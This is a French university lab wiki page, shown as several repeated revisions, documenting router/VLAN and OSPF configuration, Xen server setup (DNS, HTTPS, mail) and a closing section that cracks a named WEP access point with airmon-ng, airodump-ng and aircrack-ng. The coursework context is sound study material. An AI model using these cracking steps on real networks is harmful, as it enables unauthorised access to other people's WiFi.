allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail<br />
<br />
=== DNSSEC ===<br />
<br />
...<br />
<br />
== Attaque du WiFi ==<br />
<br />
On commence par activer le mode promicious de la carte wifi:<br />
<br />
# airmon-ng start wlan0mon<br />
<br />
On liste les points d'accès pour trouver une cible:<br />
<br />
# airodump-ng --encrypt wep wlan0mon<br />
<br />
J'ai décidé ici d'attaquer "cracotte01" (canal 10) qui est un point d'accès configuré en WEP. On commence donc par récupérer les paquets transitants par ce point d'accès:<br />
<br />
# airodump-ng -w out -c 10 -essid cracotte01 wlan0mon<br />
<br />
Heureusement pour nous, quelqu'un est déjà connecté dessus et génére beaucoup de paquets. On arrive rapidement à 200.000 paquets et on peut donc lancer le crack de la clé WEP:<br />
<br />
# aircrack-ng out-01.pcap<br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ]</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35418
TP sysres IMA2a5 2016/2017 G1
2016-11-25T11:35:51Z
<p>Dfourny : /* Xen */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
<br />
<br />
[[File:Magic.gif]]<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail<br />
<br />
=== DNSSEC ===<br />
<br />
...<br />
<br />
== Attaque du WiFi ==<br />
<br />
On commence par activer le mode promicious de la carte wifi:<br />
<br />
# airmon-ng start wlan0mon<br />
<br />
On liste les points d'accès pour trouver une cible:<br />
<br />
# airodump-ng --encrypt wep wlan0mon<br />
<br />
J'ai décidé ici d'attaquer "cracotte01" (canal 10) qui est un point d'accès configuré en WEP. On commence donc par récupérer les paquets transitants par ce point d'accès:<br />
<br />
# airodump-ng -w out -c 10 -essid cracotte01 wlan0mon<br />
<br />
Heureusement pour nous, quelqu'un est déjà connecté dessus et génére beaucoup de paquets. On arrive rapidement à 200.000 paquets et on peut donc lancer le crack de la clé WEP:<br />
<br />
# aircrack-ng out-01.pcap<br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ]</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35417
TP sysres IMA2a5 2016/2017 G1
2016-11-25T11:34:55Z
<p>Dfourny : /* Xen */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
<br />
<br />
[[File:Magic.gif]]<br />
<br />
=== DNSSEC ===<br />
<br />
...<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail<br />
<br />
== Attaque du WiFi ==<br />
<br />
On commence par activer le mode promicious de la carte wifi:<br />
<br />
# airmon-ng start wlan0mon<br />
<br />
On liste les points d'accès pour trouver une cible:<br />
<br />
# airodump-ng --encrypt wep wlan0mon<br />
<br />
J'ai décidé ici d'attaquer "cracotte01" (canal 10) qui est un point d'accès configuré en WEP. On commence donc par récupérer les paquets transitants par ce point d'accès:<br />
<br />
# airodump-ng -w out -c 10 -essid cracotte01 wlan0mon<br />
<br />
Heureusement pour nous, quelqu'un est déjà connecté dessus et génére beaucoup de paquets. On arrive rapidement à 200.000 paquets et on peut donc lancer le crack de la clé WEP:<br />
<br />
# aircrack-ng out-01.pcap<br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ]</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35416
TP sysres IMA2a5 2016/2017 G1
2016-11-25T11:31:48Z
<p>Dfourny : /* Attaque du WiFi */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
